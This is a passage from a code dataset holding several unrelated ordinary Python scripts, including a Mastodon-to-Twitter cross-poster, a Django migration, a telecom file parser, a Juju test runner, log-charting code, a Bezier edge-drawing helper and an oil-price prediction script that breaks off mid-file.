mastodon_api.account_statuses(my_acct_id, since_id = since_toot_id)\n if len(new_toots) != 0:\n since_toot_id = new_toots[0][\"id\"]\n new_toots.reverse() \n \n print('Found new toots, processing:')\n for toot in new_toots:\n content = toot[\"content\"]\n media_attachments = toot[\"media_attachments\"]\n\n # We trust mastodon to return valid HTML\n content_clean = re.sub(r']*href=\"([^\"]+)\">[^<]*', '\\g<1>', content)\n content_clean = html.unescape(str(re.compile(r'<.*?>').sub(\"\", content_clean).strip()))\n \n # Don't cross-post replies\n if len(content_clean) != 0 and content_clean[0] == '@':\n print('Skipping toot \"' + content_clean + '\" - is a reply.')\n continue\n \n # Split toots, if need be, using Many magic numbers.\n content_parts = []\n if calc_expected_status_length(content_clean) > 140:\n print('Toot bigger 140 characters, need to split...')\n current_part = \"\"\n for next_word in content_clean.split(\" \"):\n # Need to split here?\n if calc_expected_status_length(current_part + \" \" + next_word) > 135:\n print(\"new part\")\n space_left = 135 - calc_expected_status_length(current_part) - 1\n\n # Want to split word?\n if len(next_word) > 30 and space_left > 5 and not twitter.twitter_utils.is_url(next_word): \n current_part = current_part + \" \" + next_word[:space_left]\n content_parts.append(current_part)\n current_part = next_word[space_left:]\n else:\n content_parts.append(current_part)\n current_part = next_word\n\n # Split potential overlong word in current_part\n while len(current_part) > 135:\n content_parts.append(current_part[:135])\n current_part = current_part[135:] \n else:\n # Just plop next word on\n current_part = current_part + \" \" + next_word\n \n # Insert last part\n if len(current_part.strip()) != 0 or len(content_parts) == 0:\n content_parts.append(current_part.strip())\n else:\n print('Toot smaller 140 chars, posting directly...')\n content_parts.append(content_clean)\n \n # Tweet all the parts. 
On error, give up and go on with the next toot.\n        try:\n            reply_to = None\n            for i in range(len(content_parts)):\n                media_ids = []\n                content_tweet = content_parts[i] + \" --\"\n\n                # Last content part: Upload media, no -- at the end\n                if i == len(content_parts) - 1:\n                    for attachment in media_attachments:\n                        attachment_url = attachment[\"url\"]\n\n                        print('Downloading ' + attachment_url)\n                        attachment_file = requests.get(attachment_url, stream=True)\n                        attachment_file.raw.decode_content = True\n                        temp_file = tempfile.NamedTemporaryFile(delete = False)\n                        temp_file.write(attachment_file.raw.read())\n                        temp_file.close()\n\n                        file_extension = mimetypes.guess_extension(attachment_file.headers['Content-type'])\n                        upload_file_name = temp_file.name + file_extension\n                        os.rename(temp_file.name, upload_file_name)\n\n                        temp_file_read = open(upload_file_name, 'rb')\n                        print('Uploading ' + upload_file_name)\n                        media_ids.append(twitter_api.UploadMediaChunked(media = temp_file_read))\n                        temp_file_read.close()\n                        os.unlink(upload_file_name)\n\n                    content_tweet = content_parts[i]\n\n                # Tweet\n                if len(media_ids) == 0:\n                    print('Tweeting \"' + content_tweet + '\"...')\n                    reply_to = twitter_api.PostUpdate(content_tweet, in_reply_to_status_id = reply_to).id\n                else:\n                    print('Tweeting \"' + content_tweet + '\", with attachments...')\n                    reply_to = twitter_api.PostUpdate(content_tweet, media = media_ids, in_reply_to_status_id = reply_to).id\n        except:\n            print(\"Encountered error. Not retrying.\")\n\n    print('Finished toot processing, resting until next toots.')\n    time.sleep(MASTODON_POLL_DELAY)\n","sub_path":"MastodonToTwitter.py","file_name":"MastodonToTwitter.py","file_ext":"py","file_size_in_byte":12654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"404313925","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('sale', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='OrderItem',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n                ('marketplace_orderitem_id', models.CharField(max_length=15)),\n                ('shipping_price', models.IntegerField()),\n                ('quantity', models.IntegerField()),\n                ('sku', models.CharField(max_length=15)),\n                ('quantity_shipped', models.IntegerField()),\n                ('price', models.IntegerField()),\n                ('order', models.ForeignKey(to='sale.Order')),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='Product',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n                ('vendor_id', models.CharField(max_length=12)),\n                ('title', models.CharField(max_length=144)),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.AddField(\n            model_name='orderitem',\n            name='product',\n            field=models.ForeignKey(to='sale.Product'),\n            preserve_default=True,\n        ),\n    ]\n","sub_path":"m13/sale/migrations/0002_auto_20141202_2022.py","file_name":"0002_auto_20141202_2022.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"510500328","text":"import os\nimport glob\nimport re\nfrom datetime import date\n\nimport yaml\nfrom pandas import *\n\nimport log\nfrom environment import *\nfrom scr.config.model.raw_file import RawFile\n\nVENDOR = 'Vendor'\nDEFAULT_MAPPING_SHEET_NAME = 0\n\n\ndef 
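# A compact stand-alone sketch of the word-wise status splitting loop above.
# Unlike the original it ignores t.co URL shortening and never hard-splits an
# overlong word, so plain len() is enough to keep the example self-contained.
def split_status(text, limit=135):
    parts, current = [], ''
    for word in text.split(' '):
        candidate = (current + ' ' + word).strip()
        if len(candidate) > limit and current:
            parts.append(current)
            current = word
        else:
            current = candidate
    if current or not parts:
        parts.append(current)
    return parts

print(split_status('word ' * 60))  # several chunks, each at most 135 characters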
read_mapping_yaml():\n with open(MAPPING_FILE_PATH, 'r') as f:\n # doc = yaml.load(f)\n doc = yaml.safe_load(f)\n\n return doc\n\n\ndef read_data_source(vendor, region: str = None):\n\n if 'Ericsson' in vendor:\n vendor = ERICSSON_VENDOR\n elif 'Huawei' in vendor:\n vendor = HUAWEI_VENDOR\n elif 'ZTE' in vendor:\n vendor = ZTE_VENDOR\n \n # if vendor == ERICSSON_SW_VENDOR or vendor == ERICSSON_FEATURE_VENDOR:\n # vendor = ERICSSON_VENDOR\n\n yaml_value = read_mapping_yaml()\n\n xls = ExcelFile(RAW_FILE_PATH_COLLECTION)\n\n data_frame = xls.parse(xls.sheet_names[DEFAULT_MAPPING_SHEET_NAME])\n\n # print(data_frame.iterrows())\n\n raw_file_collection = []\n\n for index, row in data_frame.iterrows():\n\n # log.d(\"VENDOR : \" + row[VENDOR].upper(), vendor)\n # log.d(\"vendor : \" + vendor.upper(), vendor)\n\n if row[VENDOR].upper() != vendor.upper():\n continue\n\n raw_file = RawFile(row)\n # Read file mapping path from yaml\n \n try:\n if raw_file.FrequencyType in yaml_value[vendor]['network']:\n\n if region is not None:\n if str(raw_file.Region).lower() != region.lower():\n continue \n \n raw_file.FileMappingPath = CONFIGURATION_PATH + yaml_value[vendor]['network'][raw_file.FrequencyType]['mapping']\n if 'feature' in yaml_value[vendor] and raw_file.FrequencyType in yaml_value[vendor]['feature']:\n raw_file.FileMappingFeaturePath = CONFIGURATION_PATH + yaml_value[vendor]['feature'][raw_file.FrequencyType]['mapping']\n except:\n pass\n\n # Get valid file name in directory based on file format\n collect_file_within_path(vendor, raw_file)\n raw_file_collection.append(raw_file)\n\n return raw_file_collection\n\n\ndef collect_file_within_path(vendor, raw_file):\n log.i(\" \", vendor)\n log.i(vendor + \"_\" + raw_file.FrequencyType + \"_\" + raw_file.Region, vendor)\n log.i(\"Path : \" + raw_file.Path, vendor)\n\n if vendor == ZTE_VENDOR:\n return collect_zte_file(raw_file)\n elif vendor == HUAWEI_VENDOR:\n return collect_huawei_file(raw_file)\n elif vendor == ERICSSON_VENDOR:\n return collect_ericsson_file(raw_file)\n\n\ndef collect_huawei_file(raw_file):\n if raw_file.FrequencyType == '2G':\n collect_huawei_file_by_extension(raw_file, 'txt')\n elif raw_file.FrequencyType == '3G':\n collect_huawei_file_by_extension(raw_file, 'txt')\n elif raw_file.FrequencyType == '4G': \n # Fix LTE that now is xml.gz (compress)\n collect_huawei_file_by_extension(raw_file, 'xml.gz')\n # L2600\n collect_huawei_file_by_expression(raw_file)\n\n elif raw_file.FrequencyType == '5G':\n collect_huawei_file_by_expression(raw_file)\n # print(raw_file)\n\n\ndef collect_ericsson_file(raw_file):\n if raw_file.FrequencyType == '2G':\n collect_ericsson_2g_file(raw_file)\n elif raw_file.FrequencyType == '3G':\n collect_ericsson_file_by_extension(raw_file, 'log')\n elif raw_file.FrequencyType == '4G':\n collect_ericsson_file_by_extension(raw_file, 'log')\n elif raw_file.FrequencyType == '5G':\n collect_ericsson_file_by_extension(raw_file, 'log')\n\n\ndef collect_zte_file(raw_file): \n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.xml'):\n if re.match(raw_file.FileFormat.upper(), filename.upper()):\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), ZTE_VENDOR)\n\ndef collect_ericsson_2g_file(raw_file):\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.txt'):\n raw_file.RawFileList.append(filename)\n\n for filename in glob.glob(raw_file.Path + '*.log'):\n raw_file.RawFileList.append(filename)\n\ndef 
collect_huawei_file_by_expression(raw_file):\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*'):\n if re.match(raw_file.FileFormat.upper(), filename.upper()):\n timestamp = date.fromtimestamp(os.path.getctime(filename))\n if date.today() == timestamp:\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), HUAWEI_VENDOR)\n\n\ndef collect_huawei_file_by_extension(raw_file, file_extension):\n file_name_format = raw_file.FileFormat.split('.')[0]\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.' + file_extension):\n raw_file.RawFileList.append(filename)\n\n for filename in glob.glob(raw_file.Path + '*.' + file_extension.upper()):\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), HUAWEI_VENDOR)\n\n\ndef collect_ericsson_file_by_extension(raw_file, file_extension):\n if raw_file.Path != '':\n for filename in glob.glob(raw_file.Path + '*.' + file_extension):\n raw_file.RawFileList.append(filename)\n\n log.i(\"Read file count : \" + str(raw_file.RawFileList.__len__()), ERICSSON_VENDOR)\n","sub_path":"scr/config/parser/data_source_parser.py","file_name":"data_source_parser.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"65223517","text":"\nimport fotokat.util as util\nfrom fotokat.service.model import Model as Model\nimport numpy as np\n\ndef cmp(a, b, field):\n A = a[field] if field in a else ''\n B = b[field] if field in b else ''\n if not A:\n A = ''\n if not B:\n B = ''\n if not A and not B:\n return True\n return True if A.lower() == B.lower() else False\n\ndef cmp_author(a, b):\n field = 'author'\n A = a[field] if field in a else ''\n B = b[field] if field in b else ''\n if not A and not B:\n return True\n return True if A.lower() == ' '.join(B).lower() else False\n\n\ndef compare(result, basis):\n res = [0, 0, 0, 0]\n if not result or not basis:\n return res\n if cmp(result, basis, 'title'):\n res[0] = 1\n if cmp(result, basis, 'subtitle'):\n res[1] = 1\n if cmp(result, basis, 'publisher'):\n res[2] = 1\n if cmp_author(result, basis):\n res[3] = 1\n # print(res)\n return res\n \n\ndef compare_visual(result, basis, faust):\n print(f'Result: {result}')\n print(f'Basis: {basis}')\n if not result or not basis:\n return\n # Titel:\n print(f'Faust:\\t{faust}')\n res_title = result['title'] if 'title' in result else ''\n basis_title = basis['title'] if 'title' in basis else ''\n print(f'Title:\\t\\t{basis_title} | {res_title}')\n res_subtitle = result['subtitle'] if 'subtitle' in result else ''\n basis_subtitle = basis['subtitle'] if 'subtitle' in basis else ''\n print(f'Subitle:\\t{basis_subtitle} | {res_subtitle}')\n res_publisher = result['publisher'] if 'publisher' in result else ''\n basis_publisher = basis['publisher'] if 'publisher' in basis else ''\n print(f'Publisher:\\t{basis_publisher} | {res_publisher}')\n res_author = result['author'] if 'author' in result else ''\n basis_author = basis['author'] if 'author' in basis else ''\n print(f'Author:\\t\\t{basis_author} | {res_author}')\n \n \ndef calculate(modelname, directory='data/scan/validate'):\n print('For testing only!!!')\n model = Model(modelname)\n R = []\n for i, faust in enumerate(util.faust_generator(directory)):\n if i % 100 == 0:\n print(f'[{i}]')\n #break\n response = util.load_response(faust, directory)\n basisdata = util.load_basis(faust, directory)\n image = 
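# The collect_* helpers above all follow one pattern: glob a directory, keep
# names matching an uppercased regex, and optionally keep only files created
# today. The same logic condensed into one function (path and pattern are
# illustrative):
import glob
import os
import re
from datetime import date

def collect_today(path, name_pattern):
    hits = []
    for filename in glob.glob(os.path.join(path, '*')):
        if re.match(name_pattern.upper(), filename.upper()):
            if date.fromtimestamp(os.path.getctime(filename)) == date.today():
                hits.append(filename)
    return hits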
util.load_image(faust, directory)\n\n try:\n result = model.query(response, image)\n except ValueError:\n continue\n # compare_visual(result, basisdata, faust)\n comp = compare(result, basisdata)\n R.append(comp)\n\n if comp[2] == 0:\n print(faust)\n print(result)\n print(basisdata)\n \n R = np.array(R)\n means = np.mean(R, axis=0)\n accuracy = {}\n accuracy['title'] = means[0]\n accuracy['substitle'] = means[1]\n accuracy['publisher'] = means[2]\n accuracy['author'] = means[3]\n accuracy['all'] = np.mean(R)\n return accuracy\n","sub_path":"src/fotokat/service/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"497929221","text":"#!/usr/bin/python3\n\"\"\"Start link class to table in database\n\"\"\"\nimport sys\nfrom relationship_state import Base, State\nfrom relationship_city import City\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import (create_engine)\n\nif __name__ == \"__main__\":\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1],\n sys.argv[2],\n sys.argv[3]),\n pool_pre_ping=True)\n session = sessionmaker(bind=engine)\n s1 = session()\n result = s1.query(State).join(City).filter(State.id == City.state_id).all()\n for row in result:\n for city in row.cities:\n print(\"{}: {} -> {}\".format(city.id, city.name, row.name))\n","sub_path":"0x0F-python-object_relational_mapping/102-relationship_cities_states_list.py","file_name":"102-relationship_cities_states_list.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281393772","text":"#!/usr/bin/python3\n\nimport os\nimport subprocess\nimport re\nfrom argparse import ArgumentParser\nfrom wand import run\nfrom datetime import datetime\n\n\"\"\"\nRun juju tests.\n1. Build Juju\n2. If anything changed, run tests\n3. If any tests didn't compile, exit\n4. 
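# How calculate() above turns per-sample hit vectors into accuracies: each
# row of R is one sample's [title, subtitle, publisher, author] result, so a
# column-wise mean gives one accuracy per field and a flat mean the overall.
import numpy as np

R = np.array([
    [1, 1, 0, 1],
    [1, 0, 1, 1],
    [0, 1, 1, 1],
])
print(np.mean(R, axis=0))  # per-field accuracy: [0.667 0.667 0.667 1.0]
print(np.mean(R))          # overall accuracy: 0.75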
If any tests failed, re-run them.\n\nOptions:\n --force to run tests even if 'make install' didn't return any output.\n --rerun just re-run the failing tests from the last run, don't rebuild.\n\"\"\"\n\n\ndef main(args):\n long_tests = {\n 'state': 270,\n 'mongo': 19,\n }\n start_time = datetime.now()\n try:\n install_out = run('go install -v github.com/juju/juju/...')\n except subprocess.CalledProcessError as e:\n exit(e.returncode)\n output_filename = os.path.join(os.path.expanduser('~'),\n '.jujutestoutput.txt')\n rerun_filename = os.path.join(os.path.expanduser('~'),\n '.jujutestoutput_rerun.txt')\n\n print('Build duration:', datetime.now() - start_time)\n start_time = datetime.now()\n\n filename = None\n packages = []\n if args.changed:\n git_status = run('git status', quiet=True)\n # TODO: support new, deleted, modified, moved etc.\n for line in git_status.splitlines():\n mod = re.search('modified:\\s+(.*)/.*?\\.go$', line)\n if mod and mod.group(1) not in packages:\n packages.append(mod.group(1))\n filename = output_filename\n\n # Sort packages to do long tests last\n # TODO: long tests first, in parallel...\n packages = sorted(packages, key=lambda p: long_tests.get(p, 0))\n print(packages)\n\n with open(output_filename, 'w') as f:\n for package in packages:\n test_out, rc = run('GOMAXPROCS=32 go test github.com/juju/juju/' + package, write_to=f, fail_ok=True)\n if rc:\n exit(rc)\n print('Test duration:', datetime.now() - start_time)\n start_time = datetime.now()\n exit(0)\n\n if (len(install_out) or args.force) and not args.rerun:\n if os.path.isfile(rerun_filename):\n os.remove(rerun_filename)\n\n filename = output_filename\n with open(output_filename, 'w') as f:\n test_out, rc = run('go test ./...', write_to=f, fail_ok=True)\n print('Test duration:', datetime.now() - start_time)\n start_time = datetime.now()\n\n else:\n # Don't have a new binary, so just re-run tests\n if os.path.isfile(rerun_filename):\n filename = rerun_filename\n elif os.path.isfile(output_filename):\n filename = output_filename\n\n if filename is None:\n return\n\n with open(filename) as f:\n test_out = f.readlines()\n\n unrecoverable = False\n re_run = []\n for line in test_out:\n if(not re.search('FAIL\\s+github.*\\n', line) and\n not line.startswith('# github.com')):\n continue\n\n if re.search('failed\\]\\s*$', line):\n # Build failed or setup failed. No point re-running, but need\n # to report\n unrecoverable = True\n elif line.startswith('# github.com'):\n unrecoverable = True\n print(line)\n else:\n s = re.search('FAIL\\s+(github.com.*)\\s[\\d\\.]+s\\s*$', line)\n re_run.append(s.group(1))\n\n if len(re_run) == 0:\n return\n\n print('-' * 20, 'Failing packages', '-' * 20)\n for package in re_run:\n print(' ', package)\n\n if not unrecoverable:\n print('Re-running failed tests...')\n with open(rerun_filename, 'w') as f:\n for package in re_run:\n out, rc = run('go test ' + package, write_to=f, fail_ok=True)\n print('Re-run duration:', datetime.now() - start_time)\n start_time = datetime.now()\n else:\n print('Some failures are unrecoverable... 
not re-running.\")\n\n\nif __name__ == '__main__':\n    parser = ArgumentParser()\n    parser.add_argument('--force', action='store_true')\n    parser.add_argument('--rerun', action='store_true')\n    parser.add_argument('--changed', action='store_true')\n    args = parser.parse_args()\n    main(args)\n","sub_path":"testJuju.py","file_name":"testJuju.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"505501130","text":"from nce_log.run_log import read_csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Distribution of errors by phone model\ndef phone_mobile():\n\n    # Instantiate the data source\n    datas = read_csv()\n    # Initialize the counter\n    count_phoneModel = dict()\n\n    for row in datas:\n        # Count phone models\n        count_phoneModel[row[8]] = count_phoneModel.get(row[8], 0) + 1\n\n    print(count_phoneModel)\n    return count_phoneModel\n\n# Distribution of operating systems\ndef phone_os():\n\n    # Instantiate the data source\n    datas = read_csv()\n    count_os = dict()\n\n    for row in datas:\n        # Operating system\n        count_os[row[9]] = count_os.get(row[9], 0) + 1\n\n    print(count_os)\n    return count_os\n\n# Distribution of error messages\ndef errinfo():\n    # Instantiate the data source\n    datas = read_csv()\n    # Initialize the counter\n    count_errinfo = dict()\n\n    for row in datas:\n        # Error message\n        count_errinfo[row[13]] = count_errinfo.get(row[13], 0) + 1\n\n    print(count_errinfo)\n    return count_errinfo\n\n# Distribution of errors by lesson id\ndef errlessonid():\n    # Instantiate the data source\n    datas = read_csv()\n    count_errlessonid = dict()\n\n    for row in datas:\n        # Count errors per lesson\n        count_errlessonid[row[1]] = count_errlessonid.get(row[1], 0) + 1\n\n    print(count_errlessonid)\n    return count_errlessonid\n\ndef chart_phone_mobile():\n\n    index = []\n    values = []\n    data = sorted(phone_mobile().items(), key=lambda item: item[1], reverse=True)\n\n    for i in range(10):\n        index.append(data[i][0])\n        values.append(data[i][1])\n\n    fig, ax = plt.subplots(figsize=(16, 12))\n    ax.bar(\n        x=index,\n        height=values,\n        width=0.6,\n        align=\"center\",\n        linewidth=2.0\n    )\n    plt.xticks(rotation=-90)\n    ax.set_title(\"Phonemobile\", fontsize=15)\n\n    plt.show()\n\ndef chart_phone_os():\n\n    index = []\n    values = []\n    data = sorted(phone_os().items(), key=lambda item: item[1], reverse=True)\n\n    for i in range(4):\n        index.append(data[i][0])\n        values.append(data[i][1])\n\n    fig, ax = plt.subplots(figsize=(16, 12))\n    ax.bar(\n        x=index,\n        height=values,\n        width=0.6,\n        align=\"center\",\n        linewidth=2.0\n    )\n    ax.set_title(\"phone_os\", fontsize=15)\n\n    plt.show()\n\ndef chart_errinfo():\n\n    index = []\n    values = []\n    data = sorted(errinfo().items(), key=lambda item: item[1], reverse=True)\n\n    for i in range(3):\n        index.append(data[i][0])\n        values.append(data[i][1])\n\n    fig, ax = plt.subplots(figsize=(16, 12))\n    ax.bar(\n        x=index,\n        height=values,\n        width=0.6,\n        align=\"center\",\n        linewidth=2.0\n    )\n    ax.set_title(\"errinfo\", fontsize=15)\n\n    plt.show()\n\ndef chart_errlessonid():\n\n    index = []\n    values = []\n    data = sorted(errlessonid().items(), key=lambda item: item[1], reverse=True)\n\n    for i in range(10):\n        index.append(data[i][0])\n        values.append(data[i][1])\n\n    fig, ax = plt.subplots(figsize=(16, 12))\n    ax.bar(\n        x=index,\n        height=values,\n        width=0.6,\n        align=\"center\",\n        linewidth=2.0\n    )\n    ax.set_title(\"errlessonid\", 
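# The counting idiom used throughout analysis.py, shown standalone:
# dict.get(key, 0) + 1 builds a frequency table, and sorting the items by
# value yields the top-N entries that feed the bar charts.
rows = ['iPhone', 'Pixel', 'iPhone', 'Galaxy', 'iPhone', 'Pixel']
counts = dict()
for model in rows:
    counts[model] = counts.get(model, 0) + 1

top = sorted(counts.items(), key=lambda item: item[1], reverse=True)[:2]
print(top)  # [('iPhone', 3), ('Pixel', 2)]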
fontsize=15)\n\n # plt.bar(index, values)\n plt.show()\n\ndef write_execl():\n pass\n\nif __name__ == '__main__':\n test_phone_mobile = phone_mobile()\n test_phone_os = phone_os()\n test_errinfo = errinfo()\n test_errlessonid = errlessonid()\n\n test1 = chart_phone_mobile()\n test2 = chart_phone_os()\n test3 = chart_errinfo()\n test4 = chart_errlessonid()","sub_path":"autotestplat_tools_development/autotest_service/tools/toollib/NCE/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"296367728","text":"import bezier\nimport networkx as nx\nimport numpy as np\n\n# This code is not mine. I've just changed some var names.\n# Author: Geoff Sims, @beyondbeneath\n# Link: https://github.com/beyondbeneath/bezier-curved-edges-networkx\n# Thank you!\n\ndef curved_edges(G, pos, dist_ratio=0.2, precision=20, polarity='random'):\n edges = np.array(G.edges())\n l = edges.shape[0]\n\n if polarity == 'random':\n rnd = np.where(np.random.randint(2, size=l)==0, -1, 1)\n else:\n vec = lambda x: np.vectorize(hash)(x)\n val = np.mod(vec(edges[:,0]) + vec(edges[:,1]),2)\n rnd = np.where(val==0,-1,1)\n \n u, inv = np.unique(edges, return_inverse = True)\n coords = np.array([pos[x] for x in u])[inv]\n coords = coords.reshape([edges.shape[0], 2, edges.shape[1]])\n coords_node1 = coords[:,0,:]\n coords_node2 = coords[:,1,:]\n \n should_swap = coords_node1[:,0] > coords_node2[:,0]\n coords_node1[should_swap], coords_node2[should_swap] =\\\n coords_node2[should_swap], coords_node1[should_swap]\n \n val = np.sum((coords_node1-coords_node2)**2, axis=1)\n dist = dist_ratio * np.sqrt(val)\n\n m1 = (coords_node2[:,1]-coords_node1[:,1])/\\\n (coords_node2[:,0]-coords_node1[:,0])\n m2 = -1/m1\n\n t1 = dist/np.sqrt(1+m1**2)\n v1 = np.array([np.ones(l),m1])\n coords_node1_displace = coords_node1 + (v1*t1).T\n coords_node2_displace = coords_node2 - (v1*t1).T\n\n t2 = dist/np.sqrt(1+m2**2)\n v2 = np.array([np.ones(len(edges)),m2])\n coords_node1_ctrl = coords_node1_displace + (rnd*v2*t2).T\n coords_node2_ctrl = coords_node2_displace + (rnd*v2*t2).T\n\n node_matrix = np.array([coords_node1, coords_node1_ctrl,\n coords_node2_ctrl, coords_node2])\n\n curveplots = []\n for i in range(l):\n nodes = node_matrix[:,i,:].T\n space = np.linspace(0,1,precision)\n curve = bezier.Curve(nodes, degree=3)\n curveplots.append(curve.evaluate_multi(space).T)\n \n curves = np.array(curveplots)\n return curves\n","sub_path":"MapSci/curved_edges.py","file_name":"curved_edges.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331605361","text":"import data_functions as dataFun\n#from sklearn.metrics import accuracy_score\n#from sklearn.metrics import confusion_matrix\n#from sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.datasets import make_classification\nfrom sklearn.externals import joblib\n#import os.path\nimport time\nimport glob\n#import csv\n#import shutil\nimport pandas as pd\nimport math as m\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport os\n#from pandas_datareader import data as pdr\n#from IPython.display import display\nimport requests\nimport sys\n#sys.path.insert(1, \"/Users/qw19176/Documents/Courses/codingchallenge/\")\n\npriceDF = dataFun.dataHub(\n 
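# The core of curved_edges() above is one cubic Bezier per edge: four control
# points, evaluated at `precision` parameter values. That step in isolation:
import numpy as np
import bezier

nodes = np.asfortranarray([
    [0.0, 0.3, 0.7, 1.0],   # x of the four control points
    [0.0, 1.0, 1.0, 0.0],   # y of the four control points
])
curve = bezier.Curve(nodes, degree=3)
points = curve.evaluate_multi(np.linspace(0.0, 1.0, 20)).T  # -> (20, 2) polyline
print(points.shape)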
url=\"https://datahub.io/core/oil-prices/r/wti-daily.csv\", import_new_data=True)\noilDF = dataFun.oilProduction()\ndf = dataFun.combineFrames(priceDF, oilDF)\n# dataFun.show_more(df, 200)\ndf = df[np.isfinite(df['Prices'])]\n#indices = np.arange(0, len(df))\n#df['indx']\n#df = pd.DataFrame(index = indices, data = df)\ndf = df.sort_values(by=['Date'])\ndf = df.reset_index().drop([\"index\"], axis=1)\n\ntoday = dt.today()\ndefaultDay = (today + timedelta(days=1)).strftime('%Y-%m-%d')\n# df2 = pd.DataFrame\n\n\n\nprint(\"Please enter the date you want have a prediction for (format: 'yyyy-mm-dd')\")\n\nwhile True:\n try:\n predDate = str(input())\n datey = dt.strptime(predDate, '%Y-%m-%d').strftime('%Y-%m-%d')\n if datey > defaultDay:\n print(\"Input date too far in future, currently only 1 day into the future is predictable\")\n raise ValueError\n if datey < '2000-01-01':\n print(\"Input date too far in the past, enter a more recent date\")\n raise ValueError \n \n except(ValueError):\n try:\n print(\"Date {} entered is not suitable\".format(datey))\n agree = \"n\"\n \n print(\"Do you want to default to {}? (Y/N)\".format(defaultDay))\n \n while True:\n try:\n agree = str(input()).lower()\n \n if agree == \"y\":\n datey = defaultDay\n break\n \n elif agree == \"n\":\n break\n \n else:\n print(\"Please choose Y or N!\")\n \n except ValueError:\n print(\"Please choose Y or N!\") \n \n except(NameError):\n print(\"Please enter a date in correct format (yyyy-mm-dd)!\")\n continue\n \n if agree == \"y\":\n break\n elif agree == \"n\":\n print(\"Please enter the date you want have a prediction for (format: 'yyyy-mm-dd')\")\n continue\n else:\n break\n \nprint(\"Please enter the current ({}) WTI Oil Price\".format(\n (dt.strptime(datey, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d')))\n\nwhile True:\n try:\n newPrice = float(input())\n except(ValueError):\n print(\"Please enter a number\")\n continue\n else:\n break\n\nif datey < defaultDay:\n try:\n newProd = float(df[df[\"Date\"] == datey]['Production of Crude Oil'])\n except(TypeError):\n try:\n newday = (dt.strptime(datey, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d')\n newProd = float(df[df[\"Date\"] == newday]['Production of Crude Oil'])\n except(TypeError):\n try: \n newday = (dt.strptime(datey, '%Y-%m-%d') - timedelta(days=2)).strftime('%Y-%m-%d')\n newProd = float(df[df[\"Date\"] == newday]['Production of Crude Oil'])\n except(TypeError):\n try:\n newday = (dt.strptime(datey, '%Y-%m-%d') -\n timedelta(days=23)).strftime('%Y-%m-%d')\n newProd = float(df[df[\"Date\"] == newday]\n ['Production of Crude Oil'])\n except(TypeError):\n newProd = df['Production of Crude Oil'].iloc[-1]\nelse: \n newProd = df['Production of Crude Oil'].iloc[-1]\n \ndf = df[df[\"Date\"] < datey]\n\ndf = df.append({\"Date\": datey, \"Prices\": newPrice, \"Production of Crude Oil\": newProd}, ignore_index=True)\ndf[\"Date\"] = pd.to_datetime(df[\"Date\"])\n\n\ndef SMA(period, data):\n sma = data.rolling(window=period).mean()\n return sma\n\n\ndef ema(data, window=20):\n\n exp = data.ewm(span=window, adjust=False).mean()\n return exp\n\n\ndef bollinger(data, window=20):\n\n mid_band = SMA(window, data)\n std_dev = data.rolling(window=window).std()\n up_band = mid_band + 2*std_dev\n low_band = mid_band - 2*std_dev\n return low_band, up_band\n\n\ndef momentum(df, n):\n \"\"\"\n :param df: pandas.DataFrame \n :param n: \n :return: pandas.DataFrame\n \"\"\"\n M = pd.Series(df['Prices'].diff(n), name='Momentum_' + str(n))\n df = df.join(M)\n return df\n\n\ndef 
